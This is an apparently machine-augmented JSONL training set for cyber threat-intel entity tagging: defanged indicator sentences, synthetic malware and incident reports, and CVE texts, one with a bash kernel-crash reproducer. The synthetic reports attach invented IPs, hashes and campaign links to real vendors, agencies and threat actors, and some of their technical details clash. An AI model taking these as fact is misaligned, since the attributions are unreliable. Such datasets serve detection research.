{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE BehavesLike[ . ]Win32[ . ]Trojan[ . ]cc Trojan[Dropper]/Win32.Gluer TrojanDropper:Win32/Gluer.dam#2", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.cc": [[48, 87]]}, "info": {"id": "cyner2_train_004995", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Cobalt Strike (SHA1: 162ac8acf50b7631bc3f64c49cc63a2c8fd37ca2). Upon execution on Microsoft Exchange, the sample creates /usr/local/bin/config.dat and injects into legitimate processes. Network analysis shows beaconing to 10 [ . ] 200 [ . ] 251 [ . ] 28 every 60 seconds and DNS queries to cachebackup[.]cc. The second stage was fetched from hxxps://static-backup[.]org/gate.php and written to C:\\Users\\Public\\Documents\\beacon.dll. The payload uses ADFind-style techniques for defense evasion. A secondary hash (SHA256: bf1388b2190ec4454380f010d28ffe8e7a9b853f5461239f3c0b241b6d55d824) was extracted from the unpacked payload.", "spans": {"Malware: Cobalt Strike": [[25, 38]], "Indicator: 162ac8acf50b7631bc3f64c49cc63a2c8fd37ca2": [[46, 86]], "System: Microsoft Exchange": [[107, 125]], "Indicator: 10.200.251.28": [[247, 278]], "Indicator: cachebackup.cc": [[315, 331]], "Indicator: hxxps://static-backup.org/gate.php": [[367, 403]], "Indicator: bf1388b2190ec4454380f010d28ffe8e7a9b853f5461239f3c0b241b6d55d824": [[545, 609]]}, "info": {"id": "synth_v2_00612", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at C:\\ProgramData\\shell.php. Memory dump analysis confirmed execution of CrackMapExec. Registry modifications pointed to persistence via C:\\Users\\admin\\Desktop\\ntds.dit. Network forensics identified connections to 192[.]55[.]18[.]132 and edgecloud[.]net. Email headers traced the initial vector to helpdesk@identity-verify[ . ]cc. File /home/user/.config/csrss.exe (SHA256: 70a8aad9cc92ba43f1e2cedf481e13b2cfbd0c36ff993f276a2f458f7b023f3f) was identified as the initial dropper. A staging URL hxxps://proxycdn[.]info/gate.php resolved to 10 [ . ] 111 [ . ] 98 [ . ] 83. Secondary artifact hash: SHA256: 834ad02b3fcfeb4097f1129b9d8ccdd7bf1e7a830691222acc61096110cd55e9.", "spans": {"Indicator: 192.55.18.132": [[308, 327]], "Indicator: edgecloud.net": [[332, 347]], "Indicator: helpdesk@identity-verify.cc": [[392, 423]], "Indicator: 70a8aad9cc92ba43f1e2cedf481e13b2cfbd0c36ff993f276a2f458f7b023f3f": [[468, 532]], "Indicator: hxxps://proxycdn.info/gate.php": [[587, 619]], "Indicator: 10.111.98.83": [[632, 662]], "Indicator: 834ad02b3fcfeb4097f1129b9d8ccdd7bf1e7a830691222acc61096110cd55e9": [[697, 761]]}, "info": {"id": "synth_v2_01299", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Play Campaign:\nNetwork Indicators:\n- 10 [ . ] 88 [ . ] 30 [ . ] 142\n- 21[.]135[.]151[.]37\n- 10 [ . ] 236 [ . ] 202 [ . ] 196\n- staticstatic[ . ]live\n- nodesync[.]org\nURLs:\n- hxxps://backup-api[ . ]info/download/update.exe\n- hxxp://portalupdate[.]top/wp-content/uploads/doc.php\nEmail Senders:\n- verify@account-update[ . ]xyz\n- helpdesk@urgent-notice[.]online\nFile Indicators:\n- SHA256: 98cabf56849253fd02c371721e26a682bcbf43ef5b2dc030647918a9a3ad3fc4\n- SHA256: 1938c214fc8694b8c5d96a5a719dc48524c4f229cbe0b239844c7bf809a145ab\n- Drop path: C:\\Program Files\\Common Files\\chrome_helper.exe", "spans": {"Malware: Play": [[15, 19]], "Indicator: 10.88.30.142": [[52, 82]], "Indicator: 21.135.151.37": [[85, 104]], "Indicator: 10.236.202.196": [[107, 139]], "Indicator: staticstatic.live": [[142, 163]], "Indicator: nodesync.org": [[166, 180]], "Indicator: https://backup-api.info/download/update.exe": [[189, 236]], "Indicator: http://portalupdate.top/wp-content/uploads/doc.php": [[239, 291]], "Indicator: verify@account-update.xyz": [[309, 338]], "Indicator: helpdesk@urgent-notice.online": [[341, 372]], "Indicator: 98cabf56849253fd02c371721e26a682bcbf43ef5b2dc030647918a9a3ad3fc4": [[400, 464]], "Indicator: 1938c214fc8694b8c5d96a5a719dc48524c4f229cbe0b239844c7bf809a145ab": [[475, 539]]}, "info": {"id": "synth_v2_01450", "source": "defanged_augment"}}
{"text": "X-Force IRIS File name : cv_itworx[ . ]doc .", "spans": {"Indicator: cv_itworx.doc": [[25, 42]]}, "info": {"id": "cyberner_stix_train_005927", "source": "defanged_augment"}}
{"text": "Recorded Future published a threat intelligence report linking Mustang Panda to a new campaign exploiting CVE-2023-39714 in VMware ESXi. The attackers deployed DanaBot via Burp Suite, establishing C2 communication with 156 [ . ] 115 [ . ] 194 [ . ] 116 and static-auth[.]link. A secondary payload was downloaded from hxxps://cloud-sync[ . ]top/download/update.exe. The malware binary (SHA256: 2883be8d86321b9b27d42d362b452e1a98b17bf5ea3bcfa97b33d795efe9658c) was dropped to C:\\Users\\admin\\Downloads\\dropper.ps1. Phishing emails were sent from info@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 77 [ . ] 219 [ . ] 156 [ . ] 146.", "spans": {"Organization: Recorded Future": [[0, 15]], "Vulnerability: CVE-2023-39714": [[106, 120]], "System: VMware ESXi": [[124, 135]], "Malware: DanaBot": [[160, 167]], "Indicator: 156.115.194.116": [[219, 252]], "Indicator: static-auth.link": [[257, 275]], "Indicator: hxxps://cloud-sync.top/download/update.exe": [[317, 363]], "Indicator: 2883be8d86321b9b27d42d362b452e1a98b17bf5ea3bcfa97b33d795efe9658c": [[393, 457]], "Indicator: info@account-update.xyz": [[543, 570]], "Indicator: 77.219.156.146": [[636, 668]]}, "info": {"id": "synth_v2_00023", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Conti (SHA1: db0ea2deb71ec9d6283f737189ce8f3475c81b47). Upon execution on VMware ESXi, the sample creates C:\\Users\\admin\\Desktop\\helper.sh and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 53 [ . ] 2 [ . ] 66 every 60 seconds and DNS queries to data-storage[.]online. The second stage was fetched from hxxp://storage-mail[ . ]io/panel/index.html and written to /etc/cron.d/ntds.dit. The payload uses WinPEAS-style techniques for defense evasion. A secondary hash (SHA1: d72b75248cb7b183f0e1bf2c069e84d59b2fc0d6) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: db0ea2deb71ec9d6283f737189ce8f3475c81b47": [[38, 78]], "System: VMware ESXi": [[99, 110]], "Indicator: 192.53.2.66": [[239, 268]], "Indicator: data-storage.online": [[305, 326]], "Indicator: http://storage-mail.io/panel/index.html": [[362, 405]], "Indicator: d72b75248cb7b183f0e1bf2c069e84d59b2fc0d6": [[530, 570]]}, "info": {"id": "synth_v2_00573", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.DenseCountSparseOutput`. This is because the implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/efff014f3b2d8ef6141da30c806faf141297eca1/tensorflow/core/kernels/count_ops.cc#L123-L127) computes a divisor value from user data but does not check that the result is 0 before doing the division. Since `data` is given by the `values` argument, `num_batch_elements` is 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, and TensorFlow 2.3.3, as these are also affected.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/efff014f3b2d8ef6141da30c806faf141297eca1/tensorflow/core/kernels/count_ops.cc#L123-L127": [[212, 347]], "Vulnerability: denial of service": [[95, 112]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29554"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: return -EINVAL when namelen is 0\n\nWhen we have a corrupted main.sqlite in /var/lib/nfs/nfsdcld/, it may\nresult in namelen being 0, which will cause memdup_user() to return\nZERO_SIZE_PTR.\nWhen we access the name.data that has been assigned the value of\nZERO_SIZE_PTR in nfs4_client_to_reclaim(), null pointer dereference is\ntriggered.\n\n[ T1205] ==================================================================\n[ T1205] BUG: KASAN: null-ptr-deref in nfs4_client_to_reclaim+0xe9/0x260\n[ T1205] Read of size 1 at addr 0000000000000010 by task nfsdcld/1205\n[ T1205]\n[ T1205] CPU: 11 PID: 1205 Comm: nfsdcld Not tainted 5.10.0-00003-g2c1423731b8d #406\n[ T1205] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-buildvm-ppc64le-16[.]ppc[.]fedoraproject[.]org-3.fc31 04/01/2014\n[ T1205] Call Trace:\n[ T1205]  dump_stack+0x9a/0xd0\n[ T1205]  ? nfs4_client_to_reclaim+0xe9/0x260\n[ T1205]  __kasan_report.cold+0x34/0x84\n[ T1205]  ? nfs4_client_to_reclaim+0xe9/0x260\n[ T1205]  kasan_report+0x3a/0x50\n[ T1205]  nfs4_client_to_reclaim+0xe9/0x260\n[ T1205]  ? nfsd4_release_lockowner+0x410/0x410\n[ T1205]  cld_pipe_downcall+0x5ca/0x760\n[ T1205]  ? nfsd4_cld_tracking_exit+0x1d0/0x1d0\n[ T1205]  ? down_write_killable_nested+0x170/0x170\n[ T1205]  ? avc_policy_seqno+0x28/0x40\n[ T1205]  ? selinux_file_permission+0x1b4/0x1e0\n[ T1205]  rpc_pipe_write+0x84/0xb0\n[ T1205]  vfs_write+0x143/0x520\n[ T1205]  ksys_write+0xc9/0x170\n[ T1205]  ? __ia32_sys_read+0x50/0x50\n[ T1205]  ? ktime_get_coarse_real_ts64+0xfe/0x110\n[ T1205]  ? ktime_get_coarse_real_ts64+0xa2/0x110\n[ T1205]  do_syscall_64+0x33/0x40\n[ T1205]  entry_SYSCALL_64_after_hwframe+0x67/0xd1\n[ T1205] RIP: 0033:0x7fdbdb761bc7\n[ T1205] Code: 0f 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b7 0f 1f 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 514\n[ T1205] RSP: 002b:00007fff8c4b7248 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ T1205] RAX: ffffffffffffffda RBX: 000000000000042b RCX: 00007fdbdb761bc7\n[ T1205] RDX: 000000000000042b RSI: 00007fff8c4b75f0 RDI: 0000000000000008\n[ T1205] RBP: 00007fdbdb761bb0 R08: 0000000000000000 R09: 0000000000000001\n[ T1205] R10: 0000000000000000 R11: 0000000000000246 R12: 000000000000042b\n[ T1205] R13: 0000000000000008 R14: 00007fff8c4b75f0 R15: 0000000000000000\n[ T1205] ==================================================================\n\nFix it by checking namelen.", "spans": {"Indicator: -buildvm-ppc64le-16.ppc.fedoraproject.org": [[809, 856]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[747, 751]], "Vulnerability: null pointer dereference": [[370, 394]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-47692"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed LinPEAS artifacts at /dev/shm/update.dll. Memory dump analysis confirmed execution of Chisel. Registry modifications pointed to persistence via C:\\Windows\\Tasks\\implant.so. Network forensics identified connections to 106[.]60[.]53[.]28 and mailbackup[ . ]top. Email headers traced the initial vector to contact@auth-check[.]org. File /etc/cron.d/shell.php (SHA1: cf2190edd3bf57c794d13b2bf730275966045f7e) was identified as the initial dropper. A staging URL hxxp://loginnode[.]cc/download/update.exe resolved to 172 [ . ] 242 [ . ] 200 [ . ] 79. Secondary artifact hash: MD5: d5650ee4cb905ef3351d05e23657789a.", "spans": {"Indicator: 106.60.53.28": [[289, 307]], "Indicator: mailbackup.top": [[312, 330]], "Indicator: contact@auth-check.org": [[375, 399]], "Indicator: cf2190edd3bf57c794d13b2bf730275966045f7e": [[435, 475]], "Indicator: http://loginnode.cc/download/update.exe": [[530, 571]], "Indicator: 172.242.200.79": [[584, 616]], "Indicator: d5650ee4cb905ef3351d05e23657789a": [[648, 680]]}, "info": {"id": "synth_v2_01194", "source": "defanged_augment"}}
{"text": "Multiple stored cross-site scripting (XSS) vulnerabilities in the Commerce module in Liferay Portal 7.3.5 through 7 [ . ] 4 [ . ] 3 [ . ] 91, and Liferay DXP 7.3 update 33 and earlier, and 7.4 before update 92 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a (1) Shipping Name, (2) Shipping Phone Number, (3) Shipping Address, (4) Shipping Address 2, (5) Shipping Address 3, (6) Shipping Zip, (7) Shipping City, (8) Shipping Region (9), Shipping Country, (10) Billing Name, (11) Billing Phone Number, (12) Billing Address, (13) Billing Address 2, (14) Billing Address 3, (15) Billing Zip, (16) Billing City, (17) Billing Region, (18) Billing Country, or (19) Region Code.", "spans": {"Indicator: 7.4.3.91": [[114, 140]], "Vulnerability: cross-site scripting": [[16, 36]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-42627"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 112 [ . ] 204 [ . ] 98 [ . ] 65, the Dragos IR team identified Gootloader running as /usr/local/bin/winlogon.exe. The threat actor, believed to be Midnight Blizzard, used LinPEAS for credential harvesting and GhostPack for lateral movement. Exfiltrated data was sent to securecloud[.]club and gatewayrelay[.]site. The initial dropper (MD5: bd5bb2310768a8bcd0ddc331f8183335) was delivered via a phishing email from billing@document-share[.]link. A second C2 node was observed at 10 [ . ] 143 [ . ] 201 [ . ] 27, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\implant.so.", "spans": {"Indicator: 112.204.98.65": [[64, 95]], "Organization: Dragos": [[101, 107]], "Malware: Gootloader": [[127, 137]], "Indicator: securecloud.club": [[334, 352]], "Indicator: gatewayrelay.site": [[357, 376]], "Indicator: bd5bb2310768a8bcd0ddc331f8183335": [[404, 436]], "Indicator: billing@document-share.link": [[478, 507]], "Indicator: 10.143.201.27": [[542, 573]]}, "info": {"id": "synth_v2_00385", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvxlan: Fix NPD in {arp,neigh}_reduce() when using nexthop objects\n\nWhen the \"proxy\" option is enabled on a VXLAN device, the device will\nsuppress ARP requests and IPv6 Neighbor Solicitation messages if it is\nable to reply on behalf of the remote host. That is, if a matching and\nvalid neighbor entry is configured on the VXLAN device whose MAC address\nis not behind the \"any\" remote (0[.]0[.]0[.]0 / ::).\n\nThe code currently assumes that the FDB entry for the neighbor's MAC\naddress points to a valid remote destination, but this is incorrect if\nthe entry is associated with an FDB nexthop group. This can result in a\nNPD [1][3] which can be reproduced using [2][4].\n\nFix by checking that the remote destination exists before dereferencing\nit.\n\n[1]\nBUG: kernel NULL pointer dereference, address: 0000000000000000\n[...]\nCPU: 4 UID: 0 PID: 365 Comm: arping Not tainted 6.17.0-rc2-virtme-g2a89cb21162c #2 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc41 04/01/2014\nRIP: 0010:vxlan_xmit+0xb58/0x15f0\n[...]\nCall Trace:\n <TASK>\n dev_hard_start_xmit+0x5d/0x1c0\n __dev_queue_xmit+0x246/0xfd0\n packet_sendmsg+0x113a/0x1850\n __sock_sendmsg+0x38/0x70\n __sys_sendto+0x126/0x180\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n[2]\n #!/bin/bash\n\n ip address add 192[.]0[.]2[.]1/32 dev lo\n\n ip nexthop add id 1 via 192 [ . ] 0 [ . ] 2 [ . ] 2 fdb\n ip nexthop add id 10 group 1 fdb\n\n ip link add name vx0 up type vxlan id 10010 local 192 [ . ] 0 [ . ] 2 [ . ] 1 dstport 4789 proxy\n\n ip neigh add 192 [ . ] 0 [ . ] 2 [ . ] 3 lladdr 00:11:22:33:44:55 nud perm dev vx0\n\n bridge fdb add 00:11:22:33:44:55 dev vx0 self static nhid 10\n\n arping -b -c 1 -s 192 [ . ] 0 [ . ] 2 [ . ] 1 -I vx0 192[.]0[.]2[.]3\n\n[3]\nBUG: kernel NULL pointer dereference, address: 0000000000000000\n[...]\nCPU: 13 UID: 0 PID: 372 Comm: ndisc6 Not tainted 6.17.0-rc2-virtmne-g6ee90cb26014 #3 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1v996), BIOS 1.17.0-4.fc41 04/01/2x014\nRIP: 0010:vxlan_xmit+0x803/0x1600\n[...]\nCall Trace:\n <TASK>\n dev_hard_start_xmit+0x5d/0x1c0\n __dev_queue_xmit+0x246/0xfd0\n ip6_finish_output2+0x210/0x6c0\n ip6_finish_output+0x1af/0x2b0\n ip6_mr_output+0x92/0x3e0\n ip6_send_skb+0x30/0x90\n rawv6_sendmsg+0xe6e/0x12e0\n __sock_sendmsg+0x38/0x70\n __sys_sendto+0x126/0x180\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f383422ec77\n\n[4]\n #!/bin/bash\n\n ip address add 2001:db8:1::1/128 dev lo\n\n ip nexthop add id 1 via 2001:db8:1::1 fdb\n ip nexthop add id 10 group 1 fdb\n\n ip link add name vx0 up type vxlan id 10010 local 2001:db8:1::1 dstport 4789 proxy\n\n ip neigh add 2001:db8:1::3 lladdr 00:11:22:33:44:55 nud perm dev vx0\n\n bridge fdb add 00:11:22:33:44:55 dev vx0 self static nhid 10\n\n ndisc6 -r 1 -s 2001:db8:1::1 -w 1 2001:db8:1::3 vx0", "spans": {"Indicator: 0.0.0.0": [[453, 466]], "Indicator: 192.0.2.1": [[1410, 1425], [1580, 1607], [1795, 1822]], "Indicator: 192.0.2.2": [[1462, 1489]], "Indicator: 192.0.2.3": [[1642, 1669], [1830, 1845]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1005, 1009], [2040, 2044]], "Vulnerability: NULL pointer dereference": [[830, 854], [1863, 1887]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-39850"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 49 [ . ] 182 [ . ] 250, the INTERPOL IR team identified LockBit running as /var/tmp/lsass.dmp. The threat actor, believed to be Volt Typhoon, used Sliver for credential harvesting and PowerView for lateral movement. Exfiltrated data was sent to cachegateway[.]org and datacdn[ . ]net. The initial dropper (SHA1: 0a582f84c23b1a53a979cd4502a2d1843f839d8a) was delivered via a phishing email from security@identity-verify[.]cc. A second C2 node was observed at 46 [ . ] 26 [ . ] 60 [ . ] 251, with a persistence mechanism writing to /dev/shm/agent.py.", "spans": {"Indicator: 10.49.182.250": [[64, 95]], "Organization: INTERPOL": [[101, 109]], "Malware: LockBit": [[129, 136]], "Indicator: cachegateway.org": [[318, 336]], "Indicator: datacdn.net": [[341, 356]], "Indicator: 0a582f84c23b1a53a979cd4502a2d1843f839d8a": [[385, 425]], "Indicator: security@identity-verify.cc": [[467, 496]], "Indicator: 46.26.60.251": [[531, 561]]}, "info": {"id": "synth_v2_00336", "source": "defanged_augment"}}
{"text": "A privilege escalation vulnerability exists in Apache CloudStack versions 4 [ . ] 10 [ . ] 0 [ . ] 0 through 4[.]20[.]0[.]0 where a malicious Domain Admin user in the ROOT domain can reset the password of user-accounts of Admin role type. This operation is not appropriately restricted and allows the attacker to assume control over higher-privileged user-accounts. A malicious Domain Admin attacker can impersonate an Admin user-account and gain access to sensitive APIs and resources that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of infrastructure managed by CloudStack.\n\n\n\nUsers are recommended to upgrade to Apache CloudStack 4[.]19[.]3[.]0 or 4[.]20[.]1[.]0, which fixes the issue with the following:\n  *  Strict validation on Role Type hierarchy: the caller's user-account role must be equal to or higher than the target user-account's role.\n  *  API privilege comparison: the caller must possess all privileges of the user they are operating on. \n  *  Two new domain-level settings (restricted to the default Admin): \n - role.types.allowed.for.operations.on.accounts.of.same.role.type: Defines which role types are allowed to act on users of the same role type. Default: \"Admin, DomainAdmin, ResourceAdmin\". \n   - allow.operations.on.users.in.same.account: Allows/disallows user operations within the same account. Default: true.", "spans": {"Indicator: 4.10.0.0": [[74, 100]], "Indicator: 4.20.0.0": [[109, 123]], "Indicator: 4.19.3.0": [[710, 724]], "Indicator: 4.20.1.0": [[728, 742]], "System: Apache": [[47, 53], [692, 698]], "Vulnerability: privilege escalation": [[2, 22]], "Vulnerability: denial of service": [[576, 593]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-47713"}}
{"text": "Our researchers examined the domain that hosted the first malicious file , mol[ . ]com-ho[ . ]me .", "spans": {"Indicator: mol.com-ho.me": [[75, 96]]}, "info": {"id": "cyberner_stix_train_003000", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Amadey (MD5: 9a8498dccb0eed04eb677e42538741ae). Upon execution on Active Directory, the sample creates C:\\Program Files\\Common Files\\csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 170 [ . ] 181 [ . ] 213 every 60 seconds and DNS queries to relaybackup[ . ]site. The second stage was fetched from hxxp://gatewayupdate[ . ]link/login and written to C:\\Windows\\System32\\sam.hive. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (MD5: cbf76c746f083ba8ed2f13f838427256) was extracted from the unpacked payload.", "spans": {"Malware: Amadey": [[25, 31]], "Indicator: 9a8498dccb0eed04eb677e42538741ae": [[38, 70]], "System: Active Directory": [[91, 107]], "Indicator: 172.170.181.213": [[243, 276]], "Indicator: relaybackup.site": [[313, 333]], "Indicator: http://gatewayupdate.link/login": [[369, 404]], "Indicator: cbf76c746f083ba8ed2f13f838427256": [[537, 569]]}, "info": {"id": "synth_v2_00484", "source": "defanged_augment"}}
{"text": "Proofpoint published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2024-26162 in SonicWall SMA. The attackers deployed QakBot via Merlin, establishing C2 communication with 142[.]27[.]6[.]191 and cacheedge[ . ]club. A secondary payload was downloaded from hxxp://cloud-backup[ . ]online/admin/config. The malware binary (SHA256: 626c3d8067b532b245b03867d2c7f7578e1536e2938433a55e5ec669f48eb967) was dropped to C:\\Users\\admin\\Downloads\\config.dat. Phishing emails were sent from account@secure-verify[ . ]net targeting enterprise users. A backup C2 server was identified at 52[.]226[.]115[.]234.", "spans": {"Organization: Proofpoint": [[0, 10]], "Vulnerability: CVE-2024-26162": [[103, 117]], "System: SonicWall SMA": [[121, 134]], "Malware: QakBot": [[159, 165]], "Indicator: 142.27.6.191": [[213, 231]], "Indicator: cacheedge.club": [[236, 254]], "Indicator: hxxp://cloud-backup.online/admin/config": [[296, 339]], "Indicator: 626c3d8067b532b245b03867d2c7f7578e1536e2938433a55e5ec669f48eb967": [[369, 433]], "Indicator: account@secure-verify.net": [[518, 547]], "Indicator: 52.226.115.234": [[613, 633]]}, "info": {"id": "synth_v2_00145", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix warning when putting transaction with qgroups enabled after abort\n\nIf we have a transaction abort with qgroups enabled we get a warning\ntriggered when doing the final put on the transaction, like this:\n\n  [552.6789] ------------[ cut here ]------------\n  [552.6815] WARNING: CPU: 4 PID: 81745 at fs/btrfs/transaction.c:144 btrfs_put_transaction+0x123/0x130 [btrfs]\n  [552.6817] Modules linked in: btrfs blake2b_generic xor (...)\n  [552.6819] CPU: 4 PID: 81745 Comm: btrfs-transacti Tainted: G        W          6.4.0-rc6-btrfs-next-134+ #1\n  [552.6819] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]2-0-gea1b7a073390-prebuilt[ . ]qemu[ . ]org 04/01/2014\n  [552.6819] RIP: 0010:btrfs_put_transaction+0x123/0x130 [btrfs]\n  [552.6821] Code: bd a0 01 00 (...)\n  [552.6821] RSP: 0018:ffffa168c0527e28 EFLAGS: 00010286\n  [552.6821] RAX: ffff936042caed00 RBX: ffff93604a3eb448 RCX: 0000000000000000\n  [552.6821] RDX: ffff93606421b028 RSI: ffffffff92ff0878 RDI: ffff93606421b010\n  [552.6821] RBP: ffff93606421b000 R08: 0000000000000000 R09: ffffa168c0d07c20\n  [552.6821] R10: 0000000000000000 R11: ffff93608dc52950 R12: ffffa168c0527e70\n  [552.6821] R13: ffff93606421b000 R14: ffff93604a3eb420 R15: ffff93606421b028\n  [552.6821] FS:  0000000000000000(0000) GS:ffff93675fb00000(0000) knlGS:0000000000000000\n  [552.6821] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  [552.6821] CR2: 0000558ad262b000 CR3: 000000014feda005 CR4: 0000000000370ee0\n  [552.6822] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n  [552.6822] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n  [552.6822] Call Trace:\n  [552.6822]  <TASK>\n  [552.6822]  ? __warn+0x80/0x130\n  [552.6822]  ? btrfs_put_transaction+0x123/0x130 [btrfs]\n  [552.6824]  ? report_bug+0x1f4/0x200\n  [552.6824]  ? handle_bug+0x42/0x70\n  [552.6824]  ? exc_invalid_op+0x14/0x70\n  [552.6824]  ? asm_exc_invalid_op+0x16/0x20\n  [552.6824]  ? btrfs_put_transaction+0x123/0x130 [btrfs]\n  [552.6826]  btrfs_cleanup_transaction+0xe7/0x5e0 [btrfs]\n  [552.6828]  ? _raw_spin_unlock_irqrestore+0x23/0x40\n  [552.6828]  ? try_to_wake_up+0x94/0x5e0\n  [552.6828]  ? __pfx_process_timeout+0x10/0x10\n  [552.6828]  transaction_kthread+0x103/0x1d0 [btrfs]\n  [552.6830]  ? __pfx_transaction_kthread+0x10/0x10 [btrfs]\n  [552.6832]  kthread+0xee/0x120\n  [552.6832]  ? __pfx_kthread+0x10/0x10\n  [552.6832]  ret_from_fork+0x29/0x50\n  [552.6832]  </TASK>\n  [552.6832] ---[ end trace 0000000000000000 ]---\n\nThis corresponds to this line of code:\n\n  void btrfs_put_transaction(struct btrfs_transaction *transaction)\n  {\n      (...)\n          WARN_ON(!RB_EMPTY_ROOT(\n                          &transaction->delayed_refs.dirty_extent_root));\n      (...)\n  }\n\nThe warning happens because btrfs_qgroup_destroy_extent_records(), called\nin the transaction abort path, we free all entries from the rbtree\n\"dirty_extent_root\" with rbtree_postorder_for_each_entry_safe(), but we\ndon't actually empty the rbtree - it's still pointing to nodes that were\nfreed.\n\nSo set the rbtree's root node to NULL to avoid this warning (assign\nRB_ROOT).", "spans": {"Indicator: rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org": [[693, 753]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[648, 652]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53865"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 201 [ . ] 6 [ . ] 146 [ . ] 29, the FireEye IR team identified Amadey running as /usr/local/bin/shell.php. The threat actor, believed to be Storm-0558, used LinPEAS for credential harvesting and Hashcat for lateral movement. Exfiltrated data was sent to update-portal[ . ]live and relayedge[.]club. The initial dropper (MD5: cfb3c1585acf864b2a8991f5fe5292ce) was delivered via a phishing email from security@mail-service[ . ]info. A second C2 node was observed at 10[.]16[.]88[.]129, with a persistence mechanism writing to /home/user/.config/helper.sh.", "spans": {"Indicator: 201.6.146.29": [[64, 94]], "Organization: FireEye": [[100, 107]], "Malware: Amadey": [[127, 133]], "Indicator: update-portal.live": [[318, 340]], "Indicator: relayedge.club": [[345, 361]], "Indicator: cfb3c1585acf864b2a8991f5fe5292ce": [[389, 421]], "Indicator: security@mail-service.info": [[463, 493]], "Indicator: 10.16.88.129": [[528, 546]]}, "info": {"id": "synth_v2_00366", "source": "defanged_augment"}}
{"text": "Blog Post by Volexity: Tracking APT28's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-24446 against Windows 11 deployments. The initial access vector involves spear-phishing emails from report@document-share[.]link delivering Amadey. Post-compromise, the attackers deploy Latrodectus and use Seatbelt for reconnaissance. C2 infrastructure includes 46[.]114[.]152[.]208 and portalsync[ . ]club. A staging server at hxxp://apisecure[.]top/api/v2/auth hosts additional tooling. Key artifact: /tmp/lsass.dmp (MD5: c7e92aff25d00347cea3efa7cfa826bc).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2021-24446": [[117, 131]], "System: Windows 11": [[140, 150]], "Indicator: report@document-share.link": [[226, 254]], "Malware: Amadey": [[266, 272]], "Malware: Latrodectus": [[312, 323]], "Indicator: 46.114.152.208": [[388, 408]], "Indicator: portalsync.club": [[413, 432]], "Indicator: http://apisecure.top/api/v2/auth": [[454, 488]], "Indicator: c7e92aff25d00347cea3efa7cfa826bc": [[550, 582]]}, "info": {"id": "synth_v2_01528", "source": "defanged_augment"}}
{"text": "] com Malicious Twitter accounts : https : //twitter[.]com/lucky88755 https : //twitter[.]com/lucky98745 https : //twitter[.]com/lucky876543 https : //twitter[.]com/luckyone1232 https : //twitter[ . ]com/sadwqewqeqw https : //twitter[ . ]com/gyugyu87418490 https : //twitter[ . ]com/fdgoer343 https : //twitter[.]com/sdfghuio342 https : //twitter[ . ]com/asdqweqweqeqw https : //twitter[.]com/ukenivor3", "spans": {"Organization: Twitter": [[16, 23]], "Indicator: twitter.com": [[45, 58], [80, 93], [115, 128], [151, 164], [188, 203], [226, 241], [267, 282], [303, 316], [339, 354], [379, 392]]}, "info": {"id": "cyner_train_000124", "source": "defanged_augment"}}
